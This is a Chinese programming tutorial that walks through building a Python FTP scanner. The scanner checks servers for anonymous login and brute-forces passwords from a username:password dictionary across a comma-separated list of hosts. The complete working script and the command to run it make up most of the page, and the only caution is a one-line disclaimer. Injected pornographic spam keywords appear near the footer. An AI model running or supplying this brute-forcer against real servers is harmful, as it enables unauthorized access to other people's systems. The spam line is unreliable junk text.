腳本之家服務器常用軟件

快捷導航

Python實現(xiàn)FTP弱口令掃描器的方法示例

更新時間：2019年01月31日 08:27:18 作者：mathor

這篇文章主要介紹了Python實現(xiàn)FTP弱口令掃描器的方法示例，小編覺得挺不錯的，現(xiàn)在分享給大家，也給大家做個參考。一起跟隨小編過來看看吧

FTP服務器

FTP服務器是在互聯(lián)網上提供文件存儲和訪問服務的計算機，它們依照FTP協(xié)議提供服務。FTP是File Transfer Protocol（文件傳輸協(xié)議）的縮寫。顧名思義，就是專門用來傳輸文件的協(xié)議，簡單地說，支持FTP協(xié)議的服務器就是FTP服務器

FTP是僅基于TCP的服務，不支持UDP（想想也是，傳輸文件，肯定要穩(wěn)定可靠，建立連接，所以不支持UDP）。與眾不同的是FTP使用2個端口，一個數(shù)據端口，一個命令端口（也叫控制端口）。通常來說這兩個端口分別是21（命名端口）和20（數(shù)據端口）。但由于FTP工作方式的不同，數(shù)據端口并不總是20.這就是主動與被動FTP的最大不同之處。

主動FTP

FTP服務器的控制端口是21，數(shù)據端口是20，所以在做靜態(tài)映射的時候只需開放21端口即可，他會用20端口和客戶端主動發(fā)起連接

被動FTP

服務器的控制端口是21，數(shù)據端口是隨機的，且是客戶端去連接對應的數(shù)據端口，所以在做靜態(tài)映射的話只開放21端口不可以的

FTP掃描的實現(xiàn)方案

掃描匿名FTP

FTP匿名登陸的掃描主要應用與批量掃描中，單獨針對一個FTP服務器進行掃描的話成功率比較小。很多網站都開放FTP服務方便用戶下載資源（這個允許匿名登陸不足為奇），更瘋狂的是網站管理人員為了方便網站訪問軟件的更新也開放了FTP匿名登陸，這樣就給了我們很多機會，尤其后者的服務器很容易受到攻擊

掃描FTP弱口令

弱口令掃描其實只是掃描一些簡單的密碼組合，并不是所有可能的密碼組合

步驟

FTP匿名掃描器的實現(xiàn)

這里需要用到Python的 ftplib 庫中的FTP這個類，這個類實現(xiàn)了FTP客戶端的大多數(shù)功能，比如連接FTP服務器、查看服務器中的文件、上傳、下載文件等功能，詳細用法可以查看API，接下來我們首先定義 anonScan(hostname) 這個函數(shù)以實現(xiàn)掃描可匿名登陸的FTP服務器。代碼如下：

def anonScan(hostname):      # 參數(shù)是主機名
  try:
    with FTP(hostname) as ftp: # 創(chuàng)建FTP對象
      ftp.login()      # FTP匿名登陸
      print("\n[*]" + str(hostname) + " FTP Anonymous login successful!")
      return True
    except Exception as e:   # 拋出異常表示匿名登陸失敗
      print("\n[-]" + str(hostname) + " FTP Anonymous login failure!")
      return False

代碼很簡短，注釋也寫的很清楚。這里還是說一下函數(shù)的思路，首先用主機名構造了一個FTP對象（即ftp），然后用ftp調用不帶參數(shù)的login()函數(shù)即表示要匿名登陸這個FTP服務器，如果登陸過程中沒有產生異常，則表明匿名登陸成功，否則匿名登陸失敗

FTP弱口令的掃描

FTP弱口令掃描依賴于用戶名和密碼字典，密碼字典下載，下載之后我們將其命名為 pwd.txt

接下來針對字典中的格式來實現(xiàn)FTP弱口令掃描，創(chuàng)建代碼文件 ftpScanner.py ，代碼如下：

def vlcLogin(hostname, pwdFile):        # Parameters (hostname, dictionary file)
  try:
    with open(pwdFile, 'r') as pf:     # Open dictionary file
      for line in pf.readlines():
        userName = line.split(':')[0]  # Fetch username
        passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password
        print('[+] Trying: ' + userName + ':' + passWord)
        try:
          with FTP(hostname) as ftp:
            ftp.login(userName, passWord)
            print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \
               userName + ':' + passWord)
            return (userName, passWord)
        except Exception as e:
          # Continue trying other usernames and passwords
          pass
  except IOError as e:
    print('Error: the password file does not exist!')
  print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!')
  return (None,None)

這段代碼其實就是循環(huán)從字典中讀取用戶名和密碼并嘗試登陸，登陸成功則表明找到用戶名和密碼。由于這個函數(shù)將主機名定義成了可以用 , 分割的字符串。找到密碼并不會終止程序，而是會繼續(xù)掃描其他主機的弱口令，直到所有的主機都掃描一遍

命令行解析

至此，F(xiàn)TP掃描器幾乎已經完成了，現(xiàn)在我們要做的是讓我們的腳本可以處理命令行輸入，以控制掃描哪些主機。命令行參數(shù)我們將用到Python中的 argparse 庫。

parser = argparse.ArgumentParser(description='FTP Scanner')
  parser.add_argument('-H',dest='hostName',help='The host list with ","space')
  parser.add_argument('-f',dest='pwdFile',help='Password dictionary file')
  options = None
  try:
    options = parser.parse_args()

  except:
    print(parser.parse_args(['-h']))
    exit(0)

  hostNames = str(options.hostName).split(',')
  pwdFile = options.pwdFile

整合全部代碼

# -*- coding: utf-8 -*-
from ftplib import *
import argparse
import time

# Anonymous login scan
def anonScan(hostname):      # The parameter is the host name
  try:
    with FTP(hostname) as ftp: # Create FTP object
      ftp.login()      # FTP anonymous login
      print("\n[*]" + str(hostname) + " FTP Anonymous login successful!")
      return True
  except Exception as e:   # Throwing an exception indicates that the anonymous login failed
    print("\n[-]" + str(hostname) + " FTP Anonymous login failure!")
    return False

# Brute force
def vlcLogin(hostname, pwdFile):        # Parameters (hostname, dictionary file)
  try:
    with open(pwdFile, 'r') as pf:     # Open dictionary file
      for line in pf.readlines():
        userName = line.split(':')[0]  # Fetch username
        passWord = line.split(':')[1].strip('\r').strip('\n') # Fetch password
        print('[+] Trying: ' + userName + ':' + passWord)
        try:
          with FTP(hostname) as ftp:
            ftp.login(userName, passWord)
            print('\n[+] ' + str(hostname) + ' FTP Login successful: '+ \
               userName + ':' + passWord)
            return (userName, passWord)
        except Exception as e:
          # Continue trying other usernames and passwords
          pass
  except IOError as e:
    print('Error: the password file does not exist!')
  print('\n[-] Cannot crack the FTP password, please change the password dictionary try again!')
  return (None,None)

def main():
  parser = argparse.ArgumentParser(description='FTP Scanner')
  parser.add_argument('-H',dest='hostName',help='The host list with ","space')
  parser.add_argument('-f',dest='pwdFile',help='Password dictionary file')
  options = None
  try:
    options = parser.parse_args()

  except:
    print(parser.parse_args(['-h']))
    exit(0)

  hostNames = str(options.hostName).split(',')
  pwdFile = options.pwdFile
  if hostNames == ['None']:
    print(parser.parse_args(['-h']))
    exit(0)

  for hostName in hostNames:
    username = None
    password = None
    if anonScan(hostName) == True:
      print('Host: ' + hostName + ' Can anonymously!')
    elif pwdFile != None:
      (username,password) = vlcLogin(hostName,pwdFile)
      if password != None:
        print('\n[+] Host: ' + hostName + 'Username: ' + username + \
           'Password: ' + password)
  print('\n[*]-------------------Scan End!--------------------[*]')


if __name__ == '__main__':
  main()

測試掃描

至此就可以測試我們的FTP弱口令掃描器了，在命令行中輸入

python ftpScanner.py -H 127.0.0.1 -f pwd.txt

因為我本地并沒有開啟ftp服務，所以掃描不成功，大家可以嘗試在服務器上開放FTP服務，然后進行測試，絕對不能用于非法用途

以上就是本文的全部內容，希望對大家的學習有所幫助，也希望大家多多支持腳本之家。

欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Python實現(xiàn)FTP弱口令掃描器的方法示例

相關文章

最新評論

大家感興趣的內容

最近更新的內容

常用在線小工具